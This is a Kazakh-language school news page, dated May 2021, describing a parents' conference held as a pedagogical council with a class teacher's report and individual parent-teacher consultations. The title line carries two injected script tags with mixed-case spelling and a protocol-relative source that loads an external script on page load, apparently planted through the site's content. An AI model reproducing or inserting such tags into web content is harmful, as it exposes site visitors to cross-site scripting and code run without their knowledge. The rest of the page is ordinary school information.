Ата-аналар конференциясы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.05.2021

22 мамыр күні мектепте ата-аналар конференциясы өтті .

Конференция  өткізу  форматы – дәстүрлі. Штаттық және аралас режимде оқитын мектептер үшін ұсынылады

Ағымдағы жылы ата-аналар жиналысын педконсилиум түрінде өткізуді ұсынылады.

Педконсилиумның ерекшелігі: әрбір ата-ана барлық педагогтермен кездесіп, өзінің баласы туралы толық ақпаратты, оның пәндер бойынша үлгерімін, сабаққа қатысуын, сондай-ақ жетістіктері туралы ақпарат ала алады.

Педконсилиумның өтетін орны: мектеп холы, сыныптар.

Педконсилиумды екі бөлімге бөліп өткізу ұсынылады.

1 бөлім - сынып жетекшінің баяндамасы (жалпы ұйымдастыру мәселелерін талқылау: 2020-2021 оқу жылының қорытындылары, оқу жылының соңындағы іс-шаралар (соңғы қоңырау, мектеп бітіру кеші), жазғы мектеп жұмысын ұйымдастыру, мектеп формасы мәселелері және т.б.).

2 бөлім - баланың үлгерімін толық талдауға мүмкіндік беретін ата-ана мен мұғалімнің жеке сөйлесуі.

Әр ұйымда өткізу уақыты әртүрлі болады. Сонымен қатар, сыйымдылықты асырмау және арақашықтықты сақтау мақсатында әр параллельге әр түрлі уақытты белгілеу қажет.

Ата-ана қажетті мұғалімді еш қиындықсыз таба алуы үшін әр мұғалімнің үстелінде оның аты-жөні мен пәні жазылуы керек. Ата-ана мұғалімге келіп, баласының осы пән бойынша үлгерімі, оның сабақтағы мінез-құлқы және т.б. туралы өз сұрақтарын қояды. Педагогтер ата-аналардың сұрақтарына өздерінің педагогикалық

бақылауларына, оқушының қазіргі үлгерімі мен төртінші жиынтық бағалаудың нәтижелері бойынша жауап береді.

 

Просмотров: 622


Пікір қосу



Деректерді қолтаңбаға қосу